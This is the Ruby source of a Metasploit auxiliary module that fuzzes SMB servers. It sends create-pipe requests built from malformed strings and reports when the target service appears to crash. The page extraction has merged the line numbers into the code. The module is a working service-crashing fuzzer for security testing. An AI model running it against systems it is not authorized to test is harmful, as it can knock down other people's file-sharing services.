Path: blob/master/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'English'6class MetasploitModule < Msf::Auxiliary7include Msf::Exploit::Remote::SMB::Client8include Msf::Auxiliary::Fuzzer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'SMB Create Pipe Request Fuzzer',15'Description' => %q{16This module sends a series of SMB create pipe17requests using malicious strings.18},19'Author' => [ 'hdm' ],20'License' => MSF_LICENSE,21'Notes' => {22'Stability' => [CRASH_SERVICE_DOWN],23'SideEffects' => [],24'Reliability' => []25}26)27)28end2930def do_smb_create(pkt, _opts = {})31@connected = false32connect33smb_login34@connected = true35smb_create('\\' + pkt)36end3738def run39last_str = nil40last_inp = nil41last_err = nil4243cnt = 04445fuzz_strings do |str|46cnt += 14748if (cnt % 100 == 0)49print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")50end5152begin53do_smb_create(str, 0.25)54rescue ::Interrupt55print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")56raise $ERROR_INFO57rescue StandardError => e58last_err = e59ensure60disconnect61end6263if !@connected64if last_str65print_status("The service may have crashed: iteration:#{cnt - 1} method=#{last_inp} string=#{last_str.unpack('H*')[0]} error=#{last_err}")66else67print_status("Could not connect to the service: #{last_err}")68end69return70end7172last_str = str73last_inp = @last_fuzzer_input74end75end76end777879